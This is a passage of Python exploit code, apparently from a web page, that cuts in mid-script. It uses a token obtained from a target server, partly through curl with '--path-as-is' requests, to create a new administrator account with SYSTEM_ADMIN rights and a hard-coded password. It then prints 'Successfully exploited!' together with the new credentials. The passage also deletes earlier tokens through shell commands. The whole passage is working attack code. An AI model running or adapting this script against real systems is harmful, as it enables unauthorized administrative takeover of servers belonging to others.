delete_process.wait() delete_output = delete_process.communicate() if delete_process.returncode == 0: print("Previous token deleted successfully\nrun this command again for creating new token & admin user.") else: print("Failed to delete the previous token") elif response.status_code == 400: print("Token already exists") delete_command = f'{curl_command} -X DELETE {delete_token_url}' delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) delete_process.wait() delete_output = delete_process.communicate() if delete_process.returncode == 0: print("Previous token deleted successfully\nrun this command again for creating new token & admin user.") else: print("Failed to delete the previous token") else: print("Failed to get a token") if token: headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4)) username = f"city_admin{random_chars}" data = { "username": username, "password": "Main_password!!**", "email": "angry-admin@funnybunny.org", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]} } create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\'' create_user_response = requests.post(create_user_url, headers=headers, json=data) if create_user_response.status_code == 200: print("Successfully exploited!") print(f"URL: {url}") print(f"Username: {username}") print("Password: Main_password!!**") else: print("Failed to create new admin user") if args.verbose: if response.status_code == 400: pass else: print(f"Final curl command: {create_user_command}") </code></pre>